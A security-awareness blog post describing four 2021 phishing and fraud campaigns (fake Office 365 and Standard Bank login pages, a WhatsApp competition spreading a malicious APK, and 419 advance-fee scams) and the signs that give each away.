It’s been only 4 months now since the end of 2020 and there has been no slow-down for cyber criminals and their crafty campaigns. 2021 has already seen some of the most sophisticated hacks and breaches having taken place internationally with no end in sight unfortunately.
The following are some of the major campaigns that we’ve witnessed in March and April alone this year already:
Office 365 ‘Payment Received.html’ phishing
Standard Bank ‘SBSA_Statement.html’ phishing
Takealot/Samsung competition phishing malware
419 Phishing/Fraud
Office 365 ‘Payment Received.html’ phishing campaign
Microsoft Office, whether desktop or Cloud (365), is one of those ‘essential’ business tools that is simply unmatched by its competitors which the usage numbers can prove. According to Microsoft’s FY20 Q1 results, MS Office 365 subscriptions had exceeded 200 million active users since its birth back in November 2015. Unlike the traditional MS Office (desktop), Office 365, or as it’s now formally known – Microsoft 365, provides a multitude of cloud-based tools and features that include the ability for companies to move their on-premise solutions like MS Exchange, Active Directories and even workstations into the Cloud. This move essentially eliminates the need for expensive servers, high-end workstation and teams of IT professionals required for maintenance, making it a perfectly logical move for start-ups and small-to-medium businesses (SMBs).
Cyber criminals are never far behind the latest security and world trends and will always find ways to improve their techniques to PWN (own or dominate) their adversaries, also known as their victims.
Below is an example of how crafty the cyber fiends can be. In this example, the file ‘Payment Received.html’ is distributed via email with the body reading something along the lines of “please find attached payment”. When opening the attachment, the user is presented with the information detailed below.
There are two indicators here that the user would need to be aware of to identify this as a scam:
- The browser address bar shows that the link being accessed is not online but a local file instead. HTML files are self-contained webpages which can be accessed online or offline.
- Microsoft 365 does NOT show a blurred preview of documents or their user interface behind its login prompt. Keep in mind that Microsoft provides services to a wide variety of customers including enterprise, with security and privacy as one of their top benefits.
Beyond these two indicators, the fake login page looks believable for the most part. Cyber criminals actively target Microsoft 365 users because it is easier to fool a person than trying to brute force their way in using other methods.
MS Office 365 fake login page
The login prompt contains a hidden script which posts (submits) the entered credentials to a server presumed to be owned by the cyber-criminals, accessing the users’ address books and distributing the same email with attachments (Payment Received.html) to all contacts. The script modifies the email body and sender to fool the recipients into believing the mail was sent by the compromised user/s.
Standard Bank ‘SBSA_Statement.html’ phishing campaign
Similar to the Microsoft 365 campaign, this particular campaign relies on tricking users into entering their credentials into a fake login page created by crafty cyber criminals.
Emailed banking statements is also an area in which cyber criminals have taken advantage of users’ trust. This is a more directed attack to steal funds from the victims and potentially use the stolen information to apply for loans, purchase goods and/or apply for paid services.
Most, if not all, banks in South Africa utilise electronic communications and have an established trust with their customers. Anybody owning a bank account or dealing in finance would have received secured statements at some time or another which makes this campaign that much more believable.
The cyber criminals take full advantage of the trust built by the banking system and set up fake login pages that look very similar to Standard Bank’s and, in this case, blatantly request the users’ card number, CVV, Expiration date and phone number. This information is exactly what is then required for online purchases.
There are two indicators here that the user would need to be aware of to identify this as a scam:
- The browser address bar shows that the link for gaining access is not online but instead a local file. HTML files are self-contained webpages which can be accessed online or offline.
- No bank will ask for your credit card or debit card information as login details to view a statement. A banking card’s CVV is used as an extra layer of authentication for online purchases, assuming that the person must be in possession of the card if they have the CVV.
Fake login box
The login box contains a ‘POST’ script, which is the same as saying that it submits the data to an online resource, usually a website or webserver. Keep in mind though that this login page is not an online portal and is instead something that someone created to look like one. The information is sent to an unknown location where it will most likely be sold on the dark web to the highest bidder.
Takealot/Samsung competition phishing malware campaign
WhatsApp-distributed phishing malware campaigns have become increasingly common since smart phones became a personal vault of digital information.
Most people have their smart phones linked to every digital account that they own, and if that’s not bad enough, it’s also used as a control for many home automation systems and devices, a second form of authentication, a camera, a mobile storage for digital content (documents, photos, videos, etc.), and even as a personal computer.
This makes the compromise of a smart phone more alluring to cyber criminals in hopes that they will be rewarded generously, based on the amount of data that they manage to obtain. Smart phones, however, are mobile devices, meaning that they are on-the-go and connect to different networks multiple times during the average day. They have also become increasingly secure, making them harder targets.
Two of the several methods used to compromise a smart phone are either to gain physical access to it via theft or other methods; or have the user/owner allow access for the cybercriminal. The latter is much simpler than most may think and using WhatsApp-distributed phishing malware disguised to look like a competition is one such method.
One such campaign that was camouflaged to look like a Takealot competition was to win a Samsung Galaxy S21 smart phone. To enter the competition, the user is required to answer four simple questions and then share the link with ten of their WhatsApp friends or contacts.
The final step required is to download an APK file. APK files are mobile apps or app installers for the android operating system. Once installed, the app steals personal data from the smart phone and potentially even tracks the user’s usage, monitoring things like online banking transactions or service logins. The data is shared with the perpetrator and actively sold on the dark web and/or used in various schemes and campaigns targeting more users or holding them to ransom.
The following are the details of this campaign:
- The campaign is distributed by unknowing users, not hackers, via WhatsApp.
- The URL is clearly shown in the message and does not belong to Takealot or Samsung.
- The webpage has fake comments from fake Facebook users.
- None of the links besides the questionnaire function in any way.
- The campaign changes when accessing the URL from different parts of the world.
- The screenshots below (blue and red) were accessed using the same computer, browser, and URL. The only difference was the location chosen on the VPN software.
- One campaign specifies south Africa whereas the second specifies Seychelles. Everything else remains the same.
419 Phishing/Fraud Campaign
419 scams, also known as Advance-fee scams, originated in the early 1980’s and are still prevalent in 2021. The scam is usually simple but effective, targeting a user on a more personal level, especially on their finances. The campaign is spread via email and, for the most part, offers targets large sums of money or winnings. There have also been cases where the campaign is scripted to draw emotion and sympathy from the target. Everyone wishes they could win a lottery but winning without ever playing is unheard of and yet many people still fall for this absurd situation with this particular scam.
The 419 campaign emails do not contain any malicious file attachments or links but instead rely on a specially-crafted email body. The message content usually follows a “ need money to become a better person…” or “collect winnings/funds…” storyline, relying on the user to initiate communication. The email campaigns are distributed to anyone and everyone.
In these kinds of scams, the cybercriminal will respond to the targets’ responses, whether via email or using other communication platforms and the game plan in all cases is financial exploitation of the target.
The example below is clearly fraudulent and will never reach the point of pay-out. The intention is to have the target send funds to pay for the transactions required to expedite the pay-out. Once the funds are received, they will either attempt to gain more funds by making excuses like ‘unforeseen duties’ or ‘shortages due to exchange rates’, or simply disappear.
The further examples below are Lottery 419 campaigns but can be treated exactly the same as the one mentioned above.
One needs to watch out for these campaigns and any that are similar. Based on experience, if the information or gift campaign is not accessible from the original company’s website, or instore, then it is likely to be fake. Threat actors are actively targeting popular stores and taking advantage of people’s needs to try and save as much money as possible in these difficult economic times.